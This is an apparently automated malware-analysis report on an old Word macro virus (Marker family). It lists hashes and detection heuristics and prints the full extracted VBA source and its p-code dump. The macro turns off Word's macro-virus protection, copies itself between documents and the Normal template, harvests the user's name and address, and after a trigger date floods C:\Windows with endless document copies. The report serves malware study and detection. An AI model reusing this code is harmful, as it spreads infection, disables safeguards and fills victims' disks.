Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ff41b3a99a046b7…

MALICIOUS

Office (OLE)

30.5 KB Created: 2001-05-10 22:20:00 Authoring application: Microsoft Word 8.0 First seen: 2014-04-29
MD5: db144e6e1912111fe6c2ba1dfd4a3969 SHA-1: f3a82ee2e6c903e8bc3aacce7311d7cb3c8993ce SHA-256: 6ff41b3a99a046b743db9262d0d97f47cbc520840a3423535518ecf901a05799
220 Risk Score

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-17
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Options.VirusProtection = False
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10392 bytes
SHA-256: 1cd95080a8cecdcd7309c4072fc7a4ececd4f331d0768134213e66f9c5e7dc13
Detection
ClamAV: Doc.Trojan.Marker-17
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Shane Coursen
' SC
'
' 5/17/01 11:04:33 AM
'
' Shane Coursen
' SC
'
' 5/17/01 11:04:20 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:19:11 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:18:58 AM
'
Private Sub Document_Close()
  
  On Error Resume Next
  If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
      Const exi = "la macro de colombia"
      Dim DInfec, planinfec As Boolean
      Dim Docu, Plan As Object
      Dim modulin, contemodu, Ninfec As String
      Dim Nume As Integer
      Dim Copform As Object
   
      Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
      Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
      
      SaveDoc = ActiveDocument.Saved
      Saveplan = NormalTemplate.Saved
   
      DInfec = Docu.codemodule.Find(exi, 1, 1, 40000, 40000)
      Plainfec = Plan.codemodule.Find(exi, 1, 1, 40000, 40000)

      Ninfec = "'" & " " & Application.UserName & Chr(13) & "'" & " " & Application.UserInitials & Chr(13) & "'" & " " & Application.UserAddress & Chr(13) & "'" & " " & Now() & Chr(13) & "'" & " "
      
      Options.VirusProtection = False
   
      Nume = Mid(Int(Rnd() * 10), 1, 1)
      Nume = Nume
      nume1 = 7
      If Nume = nume1 Or Plainfec = False Then
         
         If DInfec = True And Plainfec = False Then
            Docu.codemodule.addfromstring Ninfec
            contemodu = Docu.codemodule.Lines(1, Docu.codemodule.CountOfLines)
            Plan.codemodule.addfromstring contemodu
         End If

         If DInfec = False And Plainfec = True Then
            Plan.codemodule.addfromstring Ninfec
            contemodu = Plan.codemodule.Lines(1, Plan.codemodule.CountOfLines)
            Docu.codemodule.addfromstring contemodu
         End If
         
         
      
         If SaveDoc = True Then ThisDocument.Save
         If SaveDoc = True Then NormalTemplate.Save
      End If
  End If
    sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
  sd = Trim(sd)
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
        wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    Next
  End If

End Sub


















































' Processing file: /opt/analyzer/scan_staging/466b63f722bf4b708222d1b2a3cb5c3b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5466 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #1:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #2:
' 	QuoteRem 0x0000 0x0000 ""
' Line #3:
' 	QuoteRem 0x0000 0x0014 " 5/17/01 11:04:33 AM"
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #6:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #7:
' 	QuoteRem 0x0000 0x0000 ""
' Line #8:
' 	QuoteRem 0x0000 0x0014 " 5/17/01 11:04:20 AM"
' Line #9:
' 	QuoteRem 0x0000 0x0000 ""
' Line #10:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #11:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #12:
' 	QuoteRem 0x0000 0x0000 ""
' Line #13:
' 	QuoteRem 0x0000 0x0016 " 1/24/2001 10:19:11 AM"
' Line #14:
' 	QuoteRem 0x0000 0x0000 ""
' Line #15:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #16:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #17:
' 	QuoteRem 0x0000 0x0000 ""
' Line #18:
' 	QuoteRem 0x0000 0x0016 " 1/24/2001 10:18:58 AM"
' Line #19:
' 	QuoteRem 0x0000 0x0000 ""
' Line #20:
' 	FuncDefn (Private Sub Document_Close())
' Line #21:
' Line #22:
' 	OnError (Resume Next) 
' Line #23:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #24:
' 	Dim (Const) 
' 	LitStr 0x0014 "la macro de colombia"
' 	VarDefn exi
' Line #25:
' 	Dim 
' 	VarDefn DInfec
' 	VarDefn planinfec (As Boolean)
' Line #26:
' 	Dim 
' 	VarDefn Docu
' 	VarDefn Plan (As Object)
' Line #27:
' 	Dim 
' 	VarDefn modulin
' 	VarDefn contemodu
' 	VarDefn Ninfec (As String)
' Line #28:
' 	Dim 
' 	VarDefn Nume (As Integer)
' Line #29:
' 	Dim 
' 	VarDefn Copform (As Object)
' Line #30:
' Line #31:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set Docu 
' Line #32:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set Plan 
' Line #33:
' Line #34:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St SaveDoc 
' Line #35:
' 	Ld NormalTemplate 
' 	MemLd Saved 
' 	St Saveplan 
' Line #36:
' Line #37:
' 	Ld exi 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x9C40 0x0000 
' 	LitDI4 0x9C40 0x0000 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	St DInfec 
' Line #38:
' 	Ld exi 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x9C40 0x0000 
' 	LitDI4 0x9C40 0x0000 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	St Plainfec 
' Line #39:
' Line #40:
' 	LitStr 0x0001 "'"
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserName 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserInitials 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserAddress 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	St Ninfec 
' Line #41:
' Line #42:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #43:
' Line #44:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St Nume 
' Line #45:
' 	Ld Nume 
' 	St Nume 
' Line #46:
' 	LitDI2 0x0007 
' 	St nume1 
' Line #47:
' 	Ld Nume 
' 	Ld nume1 
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #48:
' Line #49:
' 	Ld DInfec 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	IfBlock 
' Line #50:
' 	Ld Ninfec 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #51:
' 	LitDI2 0x0001 
' 	Ld Docu 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St contemodu 
' Line #52:
' 	Ld contemodu 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #53:
' 	EndIfBlock 
' Line #54:
' Line #55:
' 	Ld DInfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	IfBlock 
' Line #56:
' 	Ld Ninfec 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #57:
' 	LitDI2 0x0001 
' 	Ld Plan 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St contemodu 
' Line #58:
' 	Ld contemodu 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #59:
' 	EndIfBlock 
' Line #60:
' Line #61:
' Line #62:
' Line #63:
' 	Ld SaveDoc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ThisDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #64:
' 	Ld SaveDoc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #65:
' 	EndIfBlock 
' Line #66:
' 	EndIfBlock 
' Line #67:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitStr 0x0001 "-"
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	Concat 
' 	LitStr 0x0001 "-"
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Year 0x0001 
' 	Concat 
' 	St sd 
' Line #68:
' 	Ld sd 
' 	ArgsLd Trim 0x0001 
' 	St sd 
' Line #69:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Year 0x0001 
' 	LitDI2 0x07D0 
' 	Ge 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0006 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #70:
' 	LitStr 0x000B "C:\Windows\"
' 	ArgsCall ChangeFileOpenDirectory 0x0001 
' Line #71:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0xC9F7 0x3B9A 
' 	For 
' Line #72:
' 	LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' 	LitStr 0x0002 "AA"
' 	Ld i 
' 	Concat 
' 	LitStr 0x0006 "AA.DOC"
' 	Concat 
' 	Paren 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	LitVarSpecial (False)
' 	ParamNamed LockComments 
' 	LitStr 0x0000 ""
' 	ParamNamed Password 
' 	LitVarSpecial (True)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePassword 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnlyRecommended 
' 	LitVarSpecial (False)
' 	ParamNamed EmbedTrueTypeFonts 
' 	LitVarSpecial (False)
' 	ParamNamed SaveNativePictureFormat 
' 	LitVarSpecial (False)
' 	ParamNamed SaveFormsData 
' 	LitVarSpecial (False)
' 	ParamNamed SaveAsAOCELetter 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x000B 
' Line #73:
' 	StartForVariable 
' 	Next 
' Line #74:
' 	EndIfBlock 
' Line #75:
' Line #76:
' 	EndSub 
' Line #77:
' Line #78:
' Line #79:
' Line #80:
' Line #81:
' Line #82:
' Line #83:
' Line #84:
' Line #85:
' Line #86:
' Line #87:
' Line #88:
' Line #89:
' Line #90:
' Line #91:
' Line #92:
' Line #93:
' Line #94:
' Line #95:
' Line #96:
' Line #97:
' Line #98:
' Line #99:
' Line #100:
' Line #101:
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125: